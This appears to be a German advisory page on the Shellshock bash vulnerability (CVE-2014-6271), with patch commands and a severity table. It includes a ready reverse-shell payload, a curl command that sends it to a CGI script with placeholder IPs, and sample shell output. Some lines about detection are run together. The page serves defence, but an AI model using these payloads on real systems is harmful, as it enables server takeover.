
CVE-2014-6271

25 Jahre alter Zero-Day-Remote-Code-Ausführung in GNU Bash über Umgebungsvariablen
CVE-2014-6271, auch Shellshock oder Bashdoor genannt, ist eine kritische Schwachstelle zur Remote-Code-Ausführung (RCE) in der GNU-Bash-Shell.
Ein Angreifer kann speziell präparierte Umgebungsvariablen (über HTTP-Header, DHCP, SSH usw.) senden und Remote-Shell-Zugriff auf den zugrunde liegenden Server erlangen – oft ohne Authentifizierung und mit minimaler Benutzerinteraktion.
Angreifer injiziert eine speziell präparierte Variable (z. B. im User-Agent-Header):
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1
Bash behandelt die Nutzlast fälschlicherweise als Funktionsdefinition + nachfolgende Befehle. Der Code nach (); wird sofort ausgeführt, wenn die Variable importiert wird.
Der Befehl wird mit den Berechtigungen des Webservers/Prozesses (oft root oder www-data) ausgeführt.
Ergebnis:
# Remote-Shell-Zugriff erreicht
whoami
www-data
✅ Vulnerable! (Shellshock RCE triggered)
vulnerable
test
Sie werden auch sehen, wie sich die Reverse Shell sofort verbindet.
env x='() { :;}; echo vulnerable' bash -c "echo test"
Es wird sofort zurückgegeben:
vulnerable
test
(Dies bestätigt, dass Bash den injizierten Befehl ausgeführt hat.)
Führen Sie diesen curl-Befehl gegen ein anfälliges Apache-CGI-Skript aus:
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://vulnerable-server/cgi-bin/test.sh
Sie sehen genau diese Ausgabe in Ihrem netcat-Listener:
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...
Diese Ausgabe erscheint direkt in Ihrer Reverse-Shell. Kein Fehler, kein 404.
Das bedeutet, dass Sie vollständige Remote-Code-Ausführung auf dem Server haben – die Injektion der Umgebungsvariable hat perfekt funktioniert.
Alle GNU-Bash-Versionen:
1.14 durch 4.3 (vor Patch-Level 30)
(einschließlich Linux, macOS, BSD, eingebettete Geräte)
Sofort aktualisieren auf:
Bash 4.3 Patch-Level 30 oder höher (4.4+ empfohlen)
# Ubuntu/Debian
apt update && apt install --only-upgrade bash
# Red Hat/CentOS
yum update bash
() { zu blockierenAchten Sie auf:
() {Indikatoren für eine Kompromittierung können umfassen:
() { :;};/bin/bash -iBöswilliger Header/DHCP/SSH → Bash importiert Umgebungsvariable
↓
Funktionsdefinition + nachfolgende Befehle ausgeführt
↓
Beliebiger Befehl / Reverse Shell
Dieses Problem führte zu mehreren nachfolgenden CVEs (unvollständige Korrekturen):
| Risikobereich | Auswirkung |
|---|---|
| Vertraulichkeit | 🔴 Hoch |
| Integrität | 🔴 Hoch |
| Verfügbarkeit | 🔴 Hoch |
Wenn Sie im Jahr 2026 einen Linux-/macOS-/BSD-Server betreiben: 🔥 Patchen Sie Bash sofort (auch auf air-gapped Systemen). 💡 Gehen Sie von einer Kompromittierung aus, wenn eine ungepatchte Bash dem Internet ausgesetzt ist. 🛡 Führen Sie eine vollständige Log-Prüfung und Integritätskontrollen durch.
| Feld | Wert |
|---|
| CVE ID | CVE-2014-6271 |
| Schweregrad | 🔴 Kritisch |
| CVSS | 10.0 (Maximal) |
| Angriffsvektor | Remote (HTTP, DHCP, SSH, etc.) |
| Authentifizierung erforderlich | ❌ Keine (in vielen Vektoren) |
| Benutzerinteraktion | ❌ Keine (in CGI/DHCP-Fällen) |
| Auswirkung | Vollständige Server-Kompromittierung |